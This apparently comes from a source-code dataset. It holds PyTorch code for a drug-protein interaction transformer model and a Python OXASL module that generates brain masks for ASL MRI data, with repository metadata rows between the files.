self.icnn = nn.Conv2d(1, 3, 3, padding = 0)
self.decoder = nn.Sequential(
nn.Linear(self.flatten_dim, 512),
nn.ReLU(True),
nn.BatchNorm1d(512),
nn.Linear(512, 64),
nn.ReLU(True),
nn.BatchNorm1d(64),
nn.Linear(64, 32),
nn.ReLU(True),
#output layer
nn.Linear(32, 1)
)
def forward(self, d, p, d_mask, p_mask):
ex_d_mask = d_mask.unsqueeze(1).unsqueeze(2)
ex_p_mask = p_mask.unsqueeze(1).unsqueeze(2)
ex_d_mask = (1.0 - ex_d_mask) * -10000.0
ex_p_mask = (1.0 - ex_p_mask) * -10000.0
d_emb = self.demb(d) # batch_size x seq_length x embed_size
p_emb = self.pemb(p)
# set output_all_encoded_layers be false, to obtain the last layer hidden states only...
d_encoded_layers = self.d_encoder(d_emb.float(), ex_d_mask.float())
p_encoded_layers = self.p_encoder(p_emb.float(), ex_p_mask.float())
print("Drug encoded Layers shape: ", d_encoded_layers.shape)
print("Protein encoded Layers shape: ", p_encoded_layers.shape)
# repeat to have the same tensor size for aggregation
d_aug = torch.unsqueeze(d_encoded_layers, 2).repeat(1, 1, self.max_p, 1) # repeat along protein size
p_aug = torch.unsqueeze(p_encoded_layers, 1).repeat(1, self.max_d, 1, 1) # repeat along drug size
print("Reshaped drug encoding shape: ", d_aug.shape)
print("Reshaped protein encoding shape: ", p_aug.shape)
i = d_aug * p_aug # interaction
print("Interaction shape: ", i.shape)
# if self.gpus != 0:
# i_v = i.view(int(self.batch_size/self.gpus), -1, self.max_d, self.max_p)
# else:
i_v = i.view(self.batch_size, -1, self.max_d, self.max_p)
print(i_v.shape)
# batch_size x embed size x max_drug_seq_len x max_protein_seq_len
i_v = torch.sum(i_v, dim = 1)
print(i_v.shape)
i_v = torch.unsqueeze(i_v, 1)
print(i_v.shape)
i_v = F.dropout(i_v, p = self.dropout_rate)
#f = self.icnn2(self.icnn1(i_v))
f = self.icnn(i_v)
#print(f.shape)
#f = self.dense_net(f)
#print(f.shape)
# f = f.view(int(self.batch_size/self.gpus), -1)
f = f.view(self.batch_size, -1)
# print(f.shape)
#f_encode = torch.cat((d_encoded_layers[:,-1], p_encoded_layers[:,-1]), dim = 1)
#score = self.decoder(torch.cat((f, f_encode), dim = 1))
score = self.decoder(f)
return score
class Single_Transformer_Embedding(nn.Sequential):
def __init__(self, **config):
super(Single_Transformer_Embedding, self).__init__()
self.max_len = config["max_len"]
self.emb_size = config["emb_size"]
self.dropout_rate = config["dropout_rate"]
self.batch_size = config["batch_size"]
self.input_dim = config["input_dim"]
self.gpus = torch.cuda.device_count()
self.n_layer = 2
self.hidden_size = config["emb_size"]
self.intermediate_size = config["intermediate_size"]
self.num_attention_heads = config["num_attention_heads"]
self.attention_dropout = config["attention_probs_dropout_prob"]
self.hidden_dropout = config["hidden_dropout_prob"]
self.vocab_size = config['vocab_size']
self.flatten_dim = config["flat_dim"]
self.emb = Embeddings(self.input_dim, self.emb_size, self.max_len, self.dropout_rate)
self.encoder = Encoder_MultipleLayers(Encoder, self.n_layer, self.hidden_size, self.intermediate_size, self.num_attention_heads, self.attention_dropout, self.hidden_dropout)
self.decoder = nn.Sequential(
nn.Linear(self.hidden_size, self.vocab_size)
)
def forward(self, x):
ex_mask = 0. * x
emb = self.emb(x) # batch_size x seq_length x embed_size
# set output_all_encoded_layers be false, to obtain the last layer hidden states only...
encoded_layers = self.encoder(emb.float(), 0.)
# encoded_layers = encoded_layers.view(self.batch_size, -1)
embedding = self.decoder(encoded_layers)
return embedding
class BIN_Transformer_Single(nn.Sequential):
'''
Simple transformer encoder
'''
def __init__(self, **config):
super(BIN_Transformer_Single, self).__init__()
self.max_d = config['max_drug_seq']
self.max_p = config['max_protein_seq']
self.max_len = config['max_len'] # drug and protein concatenated
self.emb_size = config['emb_size']
self.dropout_rate = config['dropout_rate']
#densenet
self.scale_down_ratio = config['scale_down_ratio']
self.growth_rate = config['growth_rate']
self.transition_rate = config['transition_rate']
self.num_dense_blocks = config['num_dense_blocks']
self.kernal_dense_size = config['kernal_dense_size']
self.batch_size = config['batch_size']
self.input_dim = config['input_dim']
self.gpus = torch.cuda.device_count()
self.n_layer = 2
#encoder
self.hidden_size = config['emb_size']
self.intermediate_size = config['intermediate_size']
self.num_attention_heads = config['num_attention_heads']
self.attention_probs_dropout_prob = config['attention_probs_dropout_prob']
self.hidden_dropout_prob = config['hidden_dropout_prob']
self.vocab_size = config['vocab_size']
self.flatten_dim = config['flat_dim']
# specialized embedding with positional one
self.emb = Embeddings(self.input_dim, self.emb_size, self.max_len, self.dropout_rate)
self.encoder = Encoder_MultipleLayers(Encoder, self.n_layer, self.hidden_size, self.intermediate_size, self.num_attention_heads, self.attention_probs_dropout_prob, self.hidden_dropout_prob)
self.decoder = nn.Sequential(
nn.Linear(self.flatten_dim, 512),
nn.ReLU(True),
nn.BatchNorm1d(512),
nn.Linear(512, 64),
nn.ReLU(True),
nn.BatchNorm1d(64),
nn.Linear(64, 32),
nn.ReLU(True),
#output layer
nn.Linear(32, 1)
)
def forward(self, x, mask):
ex_mask = mask.unsqueeze(1).unsqueeze(2)
ex_mask = (1.0 - ex_mask) * -10000.0
emb = self.emb(x) # batch_size x seq_length x embed_size
# set output_all_encoded_layers be false, to obtain the last layer hidden states only...
encoded_layers = self.encoder(emb.float(), ex_mask.float())
print("Encoder dim: ", encoded_layers.shape)
# repeat to have the same tensor size for aggregation
# aug = torch.unsqueeze(encoded_layers, 2).repeat(1, 1, self.max_len, 1) # repeat along protein size
# print(aug.shape)
#score = self.decoder(torch.cat((f, f_encode), dim = 1))
encoded_layers = encoded_layers.view(self.batch_size, -1)
score = self.decoder(encoded_layers)
return score
# help classes
class LayerNorm(nn.Module):
def __init__(self, hidden_size, variance_epsilon=1e-12):
super(LayerNorm, self).__init__()
self.gamma = nn.Parameter(torch.ones(hidden_size))
self.beta = nn.Parameter(torch.zeros(hidden_size))
self.variance_epsilon = variance_epsilon
def forward(self, x):
u = x.mean(-1, keepdim=True)
s = (x - u).pow(2).mean(-1, keepdim=True)
x = (x - u) / torch.sqrt(s + self.variance_epsilon)
return self.gamma * x + self.beta
class Embeddings(nn.Module):
"""Construct the embeddings from protein/target, position embeddings.
"""
def __init__(self, vocab_size, hidden_size, max_position_size, dropout_rate):
super(Embeddings, self).__init__()
self.word_embeddings = nn.Embedding(vocab_size, hidden_size)
self.position_embeddings = nn.Embedding(max_position_size, hidden_size)
self.LayerNorm = LayerNorm(hidden_size)
self.dropout = nn.Dropout(dropout_rate)
def forward(self, input_ids):
seq_length = input_ids.size(1)
position_ids = torch.arange(seq_length, dtype=torch.long, device=input_ids.device)
position_ids = position_ids.unsqueeze(0).expand_as(input_ids)
words_embeddings = self.word_embeddings(input_ids)
position_embeddings = self.position_embeddings(position_ids)
embeddings = words_embeddings + position_embeddings
embeddings = self.LayerNorm(embeddings)
embeddings = self.dropout(embeddings)
return embeddings
class SelfAttention(nn.Module):
def __init__(self, hidden_size, num_attention_heads, attention_probs_dropout_prob):
super(SelfAttention, self).__init__()
if hidden_size % num_attention_heads != 0:
raise ValueError(
"The hidden size (%d) is not a multiple of the number of attention "
"heads (%d)" % (hidden_size, num_attention_heads))
self.num_attention_heads = num_attention_heads
self.attention_head_size = int(hidden_size / num_attention_heads)
self.all_head_size = self.num_attention_heads * self.attention_head_size
self.query = nn.Linear(hidden_size, self.all_head_size)
self.key = nn.Linear(hidden_size, self.all_head_size)
self.value = nn.Linear(hidden_size, self.all_head_size)
self.dropout = nn.Dropout(attention_probs_dropout_prob)
def transpose_for_scores(self, x):
new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)
x = x.view(*new_x_shape)
return x.permute(0, 2, 1, 3)
def forward(self, hidden_states, attention_mask):
mixed_query_layer = self.query(hidden_states)
mixed_key_layer = self.key(hidden_states)
mixed_value_layer = self.value(hidden_states)
query_layer = self.transpose_for_scores(mixed_query_layer)
key_layer = self.transpose_for_scores(mixed_key_layer)
value_layer = self.transpose_for_scores(mixed_value_layer)
# Take the dot product between "query" and "key" to get the raw attention scores.
attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))
attention_scores = attention_scores / math.sqrt(self.attention_head_size)
attention_scores = attention_scores + attention_mask
# Normalize the attention scores to probabilities.
attention_probs = nn.Softmax(dim=-1)(attention_scores)
# This is actually dropping out entire tokens to attend to, which might
# seem a bit unusual, but is taken from the original Transformer paper.
attention_probs = self.dropout(attention_probs)
context_layer = torch.matmul(attention_probs, value_layer)
context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)
context_layer = context_layer.view(*new_context_layer_shape)
return context_layer
class SelfOutput(nn.Module):
def __init__(self, hidden_size, hidden_dropout_prob):
super(SelfOutput, self).__init__()
self.dense = nn.Linear(hidden_size, hidden_size)
self.LayerNorm = LayerNorm(hidden_size)
self.dropout = nn.Dropout(hidden_dropout_prob)
def forward(self, hidden_states, input_tensor):
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = self.LayerNorm(hidden_states + input_tensor)
return hidden_states
class Attention(nn.Module):
def __init__(self, hidden_size, num_attention_heads, attention_probs_dropout_prob, hidden_dropout_prob):
super(Attention, self).__init__()
self.self = SelfAttention(hidden_size, num_attention_heads, attention_probs_dropout_prob)
self.output = SelfOutput(hidden_size, hidden_dropout_prob)
def forward(self, input_tensor, attention_mask):
self_output = self.self(input_tensor, attention_mask)
attention_output = self.output(self_output, input_tensor)
return attention_output
class Intermediate(nn.Module):
def __init__(self, hidden_size, intermediate_size):
super(Intermediate, self).__init__()
self.dense = nn.Linear(hidden_size, intermediate_size)
def forward(self, hidden_states):
hidden_states = self.dense(hidden_states)
hidden_states = F.relu(hidden_states)
return hidden_states
class Output(nn.Module):
def __init__(self, intermediate_size, hidden_size, hidden_dropout_prob):
super(Output, self).__init__()
self.dense = nn.Linear(intermediate_size, hidden_size)
self.LayerNorm = LayerNorm(hidden_size)
self.dropout = nn.Dropout(hidden_dropout_prob)
def forward(self, hidden_states, input_tensor):
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = self.LayerNorm(hidden_states + input_tensor)
return hidden_states
class Encoder(nn.Module):
def __init__(self, hidden_size, intermediate_size, num_attention_heads, attention_probs_dropout_prob, hidden_dropout_prob):
super(Encoder, self).__init__()
self.attention = Attention(hidden_size, num_attention_heads, attention_probs_dropout_prob, hidden_dropout_prob)
self.intermediate = Intermediate(hidden_size, intermediate_size)
self.output = Output(intermediate_size, hidden_size, hidden_dropout_prob)
def forward(self, hidden_states, attention_mask):
attention_output = self.attention(hidden_states, attention_mask)
intermediate_output = self.intermediate(attention_output)
layer_output = self.output(intermediate_output, attention_output)
return layer_output
class LinearEncoder(nn.Module):
def __init__(self, hidden_size, intermediate_size, num_attention_heads, attention_dropout, hidden_dropout):
super(LinearEncoder, self).__init__()
attention_head_size = int(hidden_size / num_attention_heads)
self.attention = LinearMultiHeadAttn(num_attention_heads, hidden_size, attention_head_size, hidden_dropout, attention_dropout)
def forward(self, hidden_states, attention_mask):
attention_output = self.attention(hidden_states, attention_mask)
return attention_output
# class DPFPEncoder(nn.Module):
# def __init__(self, hidden_size, intermediate_size, num_attention_heads, attention_dropout, hidden_dropout):
# super(DPFPEncoder, self).__init__()
# attention_head_size = int(hidden_size / num_attention_heads)
# self.attention = DPFPMultiHeadAttn(num_attention_heads, hidden_size, attention_head_size, hidden_dropout, attention_dropout)
# def forward(self, hidden_states, attention_mask):
# attention_output = self.attention(hidden_states, attention_mask)
# return attention_output
class Encoder_MultipleLayers(nn.Module):
def __init__(self, encoder, n_layer, hidden_size, intermediate_size, num_attention_heads, attention_probs_dropout_prob, hidden_dropout_prob):
super(Encoder_MultipleLayers, self).__init__()
layer = encoder(hidden_size, intermediate_size, num_attention_heads, attention_probs_dropout_prob, hidden_dropout_prob)
self.layer = nn.ModuleList([copy.deepcopy(layer) for _ in range(n_layer)])
def forward(self, hidden_states, attention_mask, output_all_encoded_layers=True):
all_encoder_layers = []
for layer_module in self.layer:
hidden_states = layer_module(hidden_states, attention_mask)
#if output_all_encoded_layers:
# all_encoder_layers.append(hidden_states)
#if not output_all_encoded_layers:
# all_encoder_layers.append(hidden_states)
return hidden_states
| 42.596811 | 199 | 0.669144 | from __future__ import print_function
import torch
from torch import nn
import torch.utils.data as Data
import torch.nn.functional as F
from torch.autograd import Variable
import numpy as np
import collections
import math
import copy
torch.manual_seed(1)
np.random.seed(1)
class BIN_Interaction_Flat(nn.Sequential):
def __init__(self, **config):
super(BIN_Interaction_Flat, self).__init__()
self.max_d = config['max_drug_seq']
self.max_p = config['max_protein_seq']
self.emb_size = config['emb_size']
self.dropout_rate = config['dropout_rate']
self.scale_down_ratio = config['scale_down_ratio']
self.growth_rate = config['growth_rate']
self.transition_rate = config['transition_rate']
self.num_dense_blocks = config['num_dense_blocks']
self.kernal_dense_size = config['kernal_dense_size']
self.batch_size = config['batch_size']
self.input_dim_drug = config['input_dim_drug']
self.input_dim_target = config['input_dim_target']
self.gpus = torch.cuda.device_count()
self.n_layer = 2
self.hidden_size = config['emb_size']
self.intermediate_size = config['intermediate_size']
self.num_attention_heads = config['num_attention_heads']
self.attention_probs_dropout_prob = config['attention_probs_dropout_prob']
self.hidden_dropout_prob = config['hidden_dropout_prob']
self.flatten_dim = config['flat_dim']
self.demb = Embeddings(self.input_dim_drug, self.emb_size, self.max_d, self.dropout_rate)
self.pemb = Embeddings(self.input_dim_target, self.emb_size, self.max_p, self.dropout_rate)
self.d_encoder = Encoder_MultipleLayers(Encoder, self.n_layer, self.hidden_size, self.intermediate_size, self.num_attention_heads, self.attention_probs_dropout_prob, self.hidden_dropout_prob)
self.p_encoder = Encoder_MultipleLayers(Encoder, self.n_layer, self.hidden_size, self.intermediate_size, self.num_attention_heads, self.attention_probs_dropout_prob, self.hidden_dropout_prob)
self.icnn = nn.Conv2d(1, 3, 3, padding = 0)
self.decoder = nn.Sequential(
nn.Linear(self.flatten_dim, 512),
nn.ReLU(True),
nn.BatchNorm1d(512),
nn.Linear(512, 64),
nn.ReLU(True),
nn.BatchNorm1d(64),
nn.Linear(64, 32),
nn.ReLU(True),
nn.Linear(32, 1)
)
def forward(self, d, p, d_mask, p_mask):
ex_d_mask = d_mask.unsqueeze(1).unsqueeze(2)
ex_p_mask = p_mask.unsqueeze(1).unsqueeze(2)
ex_d_mask = (1.0 - ex_d_mask) * -10000.0
ex_p_mask = (1.0 - ex_p_mask) * -10000.0
d_emb = self.demb(d)
p_emb = self.pemb(p)
d_encoded_layers = self.d_encoder(d_emb.float(), ex_d_mask.float())
p_encoded_layers = self.p_encoder(p_emb.float(), ex_p_mask.float())
print("Drug encoded Layers shape: ", d_encoded_layers.shape)
print("Protein encoded Layers shape: ", p_encoded_layers.shape)
d_aug = torch.unsqueeze(d_encoded_layers, 2).repeat(1, 1, self.max_p, 1)
p_aug = torch.unsqueeze(p_encoded_layers, 1).repeat(1, self.max_d, 1, 1)
print("Reshaped drug encoding shape: ", d_aug.shape)
print("Reshaped protein encoding shape: ", p_aug.shape)
i = d_aug * p_aug
print("Interaction shape: ", i.shape)
i_v = i.view(self.batch_size, -1, self.max_d, self.max_p)
print(i_v.shape)
i_v = torch.sum(i_v, dim = 1)
print(i_v.shape)
i_v = torch.unsqueeze(i_v, 1)
print(i_v.shape)
i_v = F.dropout(i_v, p = self.dropout_rate)
f = self.icnn(i_v)
f = f.view(self.batch_size, -1)
score = self.decoder(f)
return score
class Single_Transformer_Embedding(nn.Sequential):
def __init__(self, **config):
super(Single_Transformer_Embedding, self).__init__()
self.max_len = config["max_len"]
self.emb_size = config["emb_size"]
self.dropout_rate = config["dropout_rate"]
self.batch_size = config["batch_size"]
self.input_dim = config["input_dim"]
self.gpus = torch.cuda.device_count()
self.n_layer = 2
self.hidden_size = config["emb_size"]
self.intermediate_size = config["intermediate_size"]
self.num_attention_heads = config["num_attention_heads"]
self.attention_dropout = config["attention_probs_dropout_prob"]
self.hidden_dropout = config["hidden_dropout_prob"]
self.vocab_size = config['vocab_size']
self.flatten_dim = config["flat_dim"]
self.emb = Embeddings(self.input_dim, self.emb_size, self.max_len, self.dropout_rate)
self.encoder = Encoder_MultipleLayers(Encoder, self.n_layer, self.hidden_size, self.intermediate_size, self.num_attention_heads, self.attention_dropout, self.hidden_dropout)
self.decoder = nn.Sequential(
nn.Linear(self.hidden_size, self.vocab_size)
)
def forward(self, x):
ex_mask = 0. * x
emb = self.emb(x)
encoded_layers = self.encoder(emb.float(), 0.)
embedding = self.decoder(encoded_layers)
return embedding
class BIN_Transformer_Single(nn.Sequential):
def __init__(self, **config):
super(BIN_Transformer_Single, self).__init__()
self.max_d = config['max_drug_seq']
self.max_p = config['max_protein_seq']
self.max_len = config['max_len']
self.emb_size = config['emb_size']
self.dropout_rate = config['dropout_rate']
self.scale_down_ratio = config['scale_down_ratio']
self.growth_rate = config['growth_rate']
self.transition_rate = config['transition_rate']
self.num_dense_blocks = config['num_dense_blocks']
self.kernal_dense_size = config['kernal_dense_size']
self.batch_size = config['batch_size']
self.input_dim = config['input_dim']
self.gpus = torch.cuda.device_count()
self.n_layer = 2
self.hidden_size = config['emb_size']
self.intermediate_size = config['intermediate_size']
self.num_attention_heads = config['num_attention_heads']
self.attention_probs_dropout_prob = config['attention_probs_dropout_prob']
self.hidden_dropout_prob = config['hidden_dropout_prob']
self.vocab_size = config['vocab_size']
self.flatten_dim = config['flat_dim']
self.emb = Embeddings(self.input_dim, self.emb_size, self.max_len, self.dropout_rate)
self.encoder = Encoder_MultipleLayers(Encoder, self.n_layer, self.hidden_size, self.intermediate_size, self.num_attention_heads, self.attention_probs_dropout_prob, self.hidden_dropout_prob)
self.decoder = nn.Sequential(
nn.Linear(self.flatten_dim, 512),
nn.ReLU(True),
nn.BatchNorm1d(512),
nn.Linear(512, 64),
nn.ReLU(True),
nn.BatchNorm1d(64),
nn.Linear(64, 32),
nn.ReLU(True),
nn.Linear(32, 1)
)
def forward(self, x, mask):
ex_mask = mask.unsqueeze(1).unsqueeze(2)
ex_mask = (1.0 - ex_mask) * -10000.0
emb = self.emb(x)
encoded_layers = self.encoder(emb.float(), ex_mask.float())
print("Encoder dim: ", encoded_layers.shape)
layers = encoded_layers.view(self.batch_size, -1)
score = self.decoder(encoded_layers)
return score
class LayerNorm(nn.Module):
def __init__(self, hidden_size, variance_epsilon=1e-12):
super(LayerNorm, self).__init__()
self.gamma = nn.Parameter(torch.ones(hidden_size))
self.beta = nn.Parameter(torch.zeros(hidden_size))
self.variance_epsilon = variance_epsilon
def forward(self, x):
u = x.mean(-1, keepdim=True)
s = (x - u).pow(2).mean(-1, keepdim=True)
x = (x - u) / torch.sqrt(s + self.variance_epsilon)
return self.gamma * x + self.beta
class Embeddings(nn.Module):
def __init__(self, vocab_size, hidden_size, max_position_size, dropout_rate):
super(Embeddings, self).__init__()
self.word_embeddings = nn.Embedding(vocab_size, hidden_size)
self.position_embeddings = nn.Embedding(max_position_size, hidden_size)
self.LayerNorm = LayerNorm(hidden_size)
self.dropout = nn.Dropout(dropout_rate)
def forward(self, input_ids):
seq_length = input_ids.size(1)
position_ids = torch.arange(seq_length, dtype=torch.long, device=input_ids.device)
position_ids = position_ids.unsqueeze(0).expand_as(input_ids)
words_embeddings = self.word_embeddings(input_ids)
position_embeddings = self.position_embeddings(position_ids)
embeddings = words_embeddings + position_embeddings
embeddings = self.LayerNorm(embeddings)
embeddings = self.dropout(embeddings)
return embeddings
class SelfAttention(nn.Module):
def __init__(self, hidden_size, num_attention_heads, attention_probs_dropout_prob):
super(SelfAttention, self).__init__()
if hidden_size % num_attention_heads != 0:
raise ValueError(
"The hidden size (%d) is not a multiple of the number of attention "
"heads (%d)" % (hidden_size, num_attention_heads))
self.num_attention_heads = num_attention_heads
self.attention_head_size = int(hidden_size / num_attention_heads)
self.all_head_size = self.num_attention_heads * self.attention_head_size
self.query = nn.Linear(hidden_size, self.all_head_size)
self.key = nn.Linear(hidden_size, self.all_head_size)
self.value = nn.Linear(hidden_size, self.all_head_size)
self.dropout = nn.Dropout(attention_probs_dropout_prob)
def transpose_for_scores(self, x):
new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)
x = x.view(*new_x_shape)
return x.permute(0, 2, 1, 3)
def forward(self, hidden_states, attention_mask):
mixed_query_layer = self.query(hidden_states)
mixed_key_layer = self.key(hidden_states)
mixed_value_layer = self.value(hidden_states)
query_layer = self.transpose_for_scores(mixed_query_layer)
key_layer = self.transpose_for_scores(mixed_key_layer)
value_layer = self.transpose_for_scores(mixed_value_layer)
attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))
attention_scores = attention_scores / math.sqrt(self.attention_head_size)
attention_scores = attention_scores + attention_mask
attention_probs = nn.Softmax(dim=-1)(attention_scores)
attention_probs = self.dropout(attention_probs)
context_layer = torch.matmul(attention_probs, value_layer)
context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)
context_layer = context_layer.view(*new_context_layer_shape)
return context_layer
class SelfOutput(nn.Module):
def __init__(self, hidden_size, hidden_dropout_prob):
super(SelfOutput, self).__init__()
self.dense = nn.Linear(hidden_size, hidden_size)
self.LayerNorm = LayerNorm(hidden_size)
self.dropout = nn.Dropout(hidden_dropout_prob)
def forward(self, hidden_states, input_tensor):
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = self.LayerNorm(hidden_states + input_tensor)
return hidden_states
class Attention(nn.Module):
def __init__(self, hidden_size, num_attention_heads, attention_probs_dropout_prob, hidden_dropout_prob):
super(Attention, self).__init__()
self.self = SelfAttention(hidden_size, num_attention_heads, attention_probs_dropout_prob)
self.output = SelfOutput(hidden_size, hidden_dropout_prob)
def forward(self, input_tensor, attention_mask):
self_output = self.self(input_tensor, attention_mask)
attention_output = self.output(self_output, input_tensor)
return attention_output
class Intermediate(nn.Module):
def __init__(self, hidden_size, intermediate_size):
super(Intermediate, self).__init__()
self.dense = nn.Linear(hidden_size, intermediate_size)
def forward(self, hidden_states):
hidden_states = self.dense(hidden_states)
hidden_states = F.relu(hidden_states)
return hidden_states
class Output(nn.Module):
def __init__(self, intermediate_size, hidden_size, hidden_dropout_prob):
super(Output, self).__init__()
self.dense = nn.Linear(intermediate_size, hidden_size)
self.LayerNorm = LayerNorm(hidden_size)
self.dropout = nn.Dropout(hidden_dropout_prob)
def forward(self, hidden_states, input_tensor):
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = self.LayerNorm(hidden_states + input_tensor)
return hidden_states
class Encoder(nn.Module):
def __init__(self, hidden_size, intermediate_size, num_attention_heads, attention_probs_dropout_prob, hidden_dropout_prob):
super(Encoder, self).__init__()
self.attention = Attention(hidden_size, num_attention_heads, attention_probs_dropout_prob, hidden_dropout_prob)
self.intermediate = Intermediate(hidden_size, intermediate_size)
self.output = Output(intermediate_size, hidden_size, hidden_dropout_prob)
def forward(self, hidden_states, attention_mask):
attention_output = self.attention(hidden_states, attention_mask)
intermediate_output = self.intermediate(attention_output)
layer_output = self.output(intermediate_output, attention_output)
return layer_output
class LinearEncoder(nn.Module):
def __init__(self, hidden_size, intermediate_size, num_attention_heads, attention_dropout, hidden_dropout):
super(LinearEncoder, self).__init__()
attention_head_size = int(hidden_size / num_attention_heads)
self.attention = LinearMultiHeadAttn(num_attention_heads, hidden_size, attention_head_size, hidden_dropout, attention_dropout)
def forward(self, hidden_states, attention_mask):
attention_output = self.attention(hidden_states, attention_mask)
return attention_output
class Encoder_MultipleLayers(nn.Module):
def __init__(self, encoder, n_layer, hidden_size, intermediate_size, num_attention_heads, attention_probs_dropout_prob, hidden_dropout_prob):
super(Encoder_MultipleLayers, self).__init__()
layer = encoder(hidden_size, intermediate_size, num_attention_heads, attention_probs_dropout_prob, hidden_dropout_prob)
self.layer = nn.ModuleList([copy.deepcopy(layer) for _ in range(n_layer)])
def forward(self, hidden_states, attention_mask, output_all_encoded_layers=True):
all_encoder_layers = []
for layer_module in self.layer:
hidden_states = layer_module(hidden_states, attention_mask)
return hidden_states
| true | true |
f73265c9edaae6ec1281e7f5b9116e4c14930790 | 3,488 | py | Python | oxasl/mask.py | ibme-qubic/oxasl | 8a0c055752d6e10cd932336ae6916f0c4fc0a2e9 | [
"Apache-2.0"
] | 1 | 2020-11-02T13:01:47.000Z | 2020-11-02T13:01:47.000Z | oxasl/mask.py | ibme-qubic/oxasl | 8a0c055752d6e10cd932336ae6916f0c4fc0a2e9 | [
"Apache-2.0"
] | 13 | 2019-01-14T13:22:00.000Z | 2020-09-12T20:34:20.000Z | oxasl/mask.py | physimals/oxasl | e583103f3313aed2890b60190b6ca7b265a46e3c | [
"Apache-2.0"
] | 3 | 2019-03-19T15:46:48.000Z | 2020-03-13T16:55:48.000Z | """
OXASL - Module to generate a suitable mask for ASL data
Copyright (c) 2008-2020 Univerisity of Oxford
"""
import numpy as np
import scipy as sp
import fsl.wrappers as fsl
from fsl.data.image import Image
from oxasl import reg
from oxasl.reporting import LightboxImage
def generate_mask(wsp):
"""
For compatibility
"""
run(wsp)
def run(wsp):
"""
Generate mask for ASL data
- If a ready-made mask image is provided or has already been generated, this is returned
- If a structural image is provided this will be used. Brain extraction and registration
will be performed if required
- If a calibration image is provided, this is used. It is assumed to be in the same space
as the ASL data
- If none of the above are present, the ASL data itself is averaged and brain extracted
to produce the mask
Required workspace attributes
-----------------------------
Formally there are no required attributes, however at least one image must be provided
which enables a mask to be generated.
Optional workspace attributes
-----------------------------
- ``asldata`` : ASL data image
- ``mask`` : Existing brain mask
- ``struc`` : Structural image (wholehead)
- ``struc_brain``: Already brain-extracted structural image
- ``asl2struc`` : Existring ASL->Structural space transformation matrix
- ``calib`` : Calibration image
- ``nativeref`` : ASL registration source image
"""
if wsp.rois is not None and wsp.rois.mask is not None:
return
wsp.sub("rois")
wsp.log.write("\nGenerating ASL data mask\n")
# Reporting
page = wsp.report.page("mask")
page.heading("Mask generation", level=0)
if wsp.mask is not None:
wsp.rois.mask_src = "user"
mask_source = "provided by user (assumed to be ASL space): %s" % wsp.mask.name
wsp.rois.mask = wsp.mask
elif wsp.structural is not None and wsp.structural.struc is not None:
# Preferred option is to use brain extracted structural
wsp.rois.mask_src = "struc"
page.heading("Brain extracted structural image", level=1)
page.image("struc_brain", LightboxImage(wsp.structural.brain, bgimage=wsp.structural.struc))
wsp.rois.mask_struc = wsp.structural.brain_mask
wsp.rois.mask_asl = reg.change_space(wsp, wsp.structural.brain_mask, "native")
wsp.rois.mask = Image(sp.ndimage.morphology.binary_fill_holes((wsp.rois.mask_asl.data > 0.25)).astype(np.int), header=wsp.rois.mask_asl.header)
mask_source = "generated from brain extracting structural image and registering to ASL space"
else:
# Alternatively, use registration image (which will be BETed calibration or mean ASL image)
wsp.rois.mask_src = "nativeref"
wsp.rois.mask = Image((wsp.reg.nativeref.data != 0).astype(np.int), header=wsp.reg.nativeref.header)
mask_source = "generated from brain extracted registration ASL image"
wsp.log.write(" - Mask %s\n" % mask_source)
page.heading("Masked ASL brain image", level=1)
page.text("Mask was %s" % mask_source)
page.text("PW ASL image masked by ASL-space mask")
if wsp.asldata.iaf in ("diff", "tc", "ct"):
page.image("mask_outline", LightboxImage(wsp.rois.mask, bgimage=wsp.asldata.perf_weighted(), outline=True))
else:
page.image("mask_outline", LightboxImage(wsp.rois.mask, bgimage=wsp.asldata.mean(), outline=True))
| 39.191011 | 151 | 0.675745 | import numpy as np
import scipy as sp
import fsl.wrappers as fsl
from fsl.data.image import Image
from oxasl import reg
from oxasl.reporting import LightboxImage
def generate_mask(wsp):
run(wsp)
def run(wsp):
if wsp.rois is not None and wsp.rois.mask is not None:
return
wsp.sub("rois")
wsp.log.write("\nGenerating ASL data mask\n")
page = wsp.report.page("mask")
page.heading("Mask generation", level=0)
if wsp.mask is not None:
wsp.rois.mask_src = "user"
mask_source = "provided by user (assumed to be ASL space): %s" % wsp.mask.name
wsp.rois.mask = wsp.mask
elif wsp.structural is not None and wsp.structural.struc is not None:
wsp.rois.mask_src = "struc"
page.heading("Brain extracted structural image", level=1)
page.image("struc_brain", LightboxImage(wsp.structural.brain, bgimage=wsp.structural.struc))
wsp.rois.mask_struc = wsp.structural.brain_mask
wsp.rois.mask_asl = reg.change_space(wsp, wsp.structural.brain_mask, "native")
wsp.rois.mask = Image(sp.ndimage.morphology.binary_fill_holes((wsp.rois.mask_asl.data > 0.25)).astype(np.int), header=wsp.rois.mask_asl.header)
mask_source = "generated from brain extracting structural image and registering to ASL space"
else:
wsp.rois.mask_src = "nativeref"
wsp.rois.mask = Image((wsp.reg.nativeref.data != 0).astype(np.int), header=wsp.reg.nativeref.header)
mask_source = "generated from brain extracted registration ASL image"
wsp.log.write(" - Mask %s\n" % mask_source)
page.heading("Masked ASL brain image", level=1)
page.text("Mask was %s" % mask_source)
page.text("PW ASL image masked by ASL-space mask")
if wsp.asldata.iaf in ("diff", "tc", "ct"):
page.image("mask_outline", LightboxImage(wsp.rois.mask, bgimage=wsp.asldata.perf_weighted(), outline=True))
else:
page.image("mask_outline", LightboxImage(wsp.rois.mask, bgimage=wsp.asldata.mean(), outline=True))
| true | true |
f7326634ece2f34cc1465b450f8505c188b6eaa4 | 1,769 | py | Python | src/gtk/toga_gtk/widgets/splitcontainer.py | saluk/toga | f8bea583c87642ad102776e1b58fd8bb9265b135 | [
"BSD-3-Clause"
] | null | null | null | src/gtk/toga_gtk/widgets/splitcontainer.py | saluk/toga | f8bea583c87642ad102776e1b58fd8bb9265b135 | [
"BSD-3-Clause"
